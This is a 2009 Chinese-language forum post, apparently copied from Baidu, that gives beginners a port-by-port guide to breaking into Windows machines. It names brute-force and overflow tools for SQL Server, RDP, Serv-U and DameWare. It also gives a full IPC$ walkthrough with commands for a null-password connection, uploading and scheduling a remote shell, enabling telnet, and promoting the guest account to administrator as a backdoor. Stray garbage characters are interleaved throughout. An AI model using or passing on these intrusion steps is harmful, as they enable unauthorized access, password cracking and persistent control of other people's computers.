飞翔无限fxwx.com广西经贸职业技术学院论坛

标题: 各个端口入侵方法 [打印本页]
作者: 月中水    时间: 2009-10-16 03:00
标题: 各个端口入侵方法
来源:hi.baidu
* q; c( d3 r: g$ `0 v希望对新手入侵有帮助!
+ d' v, Y9 R& M' \9 b& e$ v5 n  1. 1433端口入侵
7 H* P% j8 o( e  |! k- g  scanport.exe 查有1433的机器
; A1 U+ G% f# ?5 K" q" t  SQLScanPass.exe 进行字典暴破(字典是关键)
8 W. e; w# C3 E- k  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。0 `+ |8 O0 \: h
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口$ b$ I, P" v2 P/ e# G+ L
  (以上反向的,测试成功)
4 R; k, f) o/ I7 X& G  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)* d; E6 H5 X3 D/ \( }" h0 _' `
  2. 4899端口入侵
% ?" R2 ~. G' I# c1 T  用4899过滤器.exe,扫描空口令的机器' s) ]1 }/ n. ~( @
  3. 3899的入侵
3 H5 w1 L' R' A0 L/ m  对很早的机器,可以试试3389的溢出(win3389ex.exe)
: H8 r* \1 V  f" j1 k( r  o  对2000的机器,可以试试字典暴破。(tscrack.exe)4 g0 M4 H6 Q0 K, [  C6 ?. T1 L( k
  4. 80入侵( }, Z  J* d2 F9 [; V  n# [: Z
  对sp3以前的机器,可以用webdav入侵;" Q  T7 O$ @0 O3 l+ h0 L1 n
  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)8 r* k: W* T9 N; c$ j: x; B
  可以利用SQL进行注入。(啊D的注入软件)。
9 z, v8 N& b/ Y  5. serv-u入侵(21端口); C9 f6 n! c2 O' p
  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)/ g7 Z' d6 ~" K* N+ J
  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)" b% H  v# B. \; J; [! R
  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
7 T! ]8 X, |/ o7 z& [  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码" O# Q0 s" E( b* K( Z
  6. 554端口: k% f! Y3 W; |: J* p. f
  用real554.exe入侵。
1 K- U" J/ Y5 D+ a7 F; b4 _- R  7. 6129端口
/ L( S+ {0 c# v0 h  用DameWare6129.exe入侵。
8 H. C  k5 g  j, D; V4 ]  8. 系统漏洞# p, Z6 d3 @5 r$ a
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。% r' |& r5 [! j" C) P) R
9. 3127等端口' j# j" o8 V' K! K7 g
* S6 I" y6 ]  A. o$ C6 G5 U! e
  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
5 Z8 i; I7 r& j, W. z/ E# B  10. 其他入侵, B* ~4 E' d8 }$ e$ `
  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。8 u+ E8 a; B& j6 m' Z( C4 O  s
* |2 B3 Y; w! _! i$ ~5 n8 r6 V
                              经典IPC$入侵5 Y" h0 @5 f+ i
! b/ r# f- C/ |3 w9 F4 {4 q5 R' Q
  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
7 H& j8 C: d; ^# z! A  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。1 p/ k* d$ k- ~1 C" \
  2. C:\>copy srv.exe $">\\127.0.0.1\admin$
: X: D8 B' E, P$ a3 c: N0 R: q  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。2 C7 j; U0 R0 a* F( O
  3. C:\>net time file://127.0.0.1/1 S5 B- v( P0 ?9 T/ Z% H3 `2 Z
  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。2 d; J) Y; _- o! m
  4. C:\>at file://127.0.0.1/ 11:05 srv.exe
+ u4 p* b& h' p" T3 w: X  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
, G0 P, X2 @- m; n  5. C:\>net time file://127.0.0.1/
: H7 X; e+ w/ ?# q  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
; {3 u' n2 R9 t( Y8 z: W  6. C:\>telnet 127.0.0.1 99
; w* _) N+ M" L4 v  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。" `" N! Y. ^+ L, U1 Y
  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了0 X' ?: r( m, L$ v/ r
  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$% x+ t- k! [' i. O% U4 P, `* ~  J
  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。7 X& v6 h) J$ F! Z- f
  8. C:\WINNT\system32>ntlm& l3 f4 E2 R$ G/ k9 H
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9 P0 a( v! r$ |; {. Y8 S$ `  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
  H, D( O* z# L3 L- l  ~6 d& x5 W9 O, K  10. C:\>net user guest /active:yes5 f# W9 ]6 \5 z3 k% I' c1 t* w
  将对方的Guest用户激活" C" \1 ~/ q/ r! w! J
  11. C:\>net user guest 12340 m$ x0 x9 p- R9 k
  将Guest的密码改为1234,或者你要设定的密码
- B% |% L% k0 h  12. C:\>net localgroup administrators guest /add
$ G- ^; z7 c! A: w1 f. X  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)



欢迎光临 飞翔无限fxwx.com广西经贸职业技术学院论坛 (http://gxjmbbs.com/) Powered by Discuz! X3.2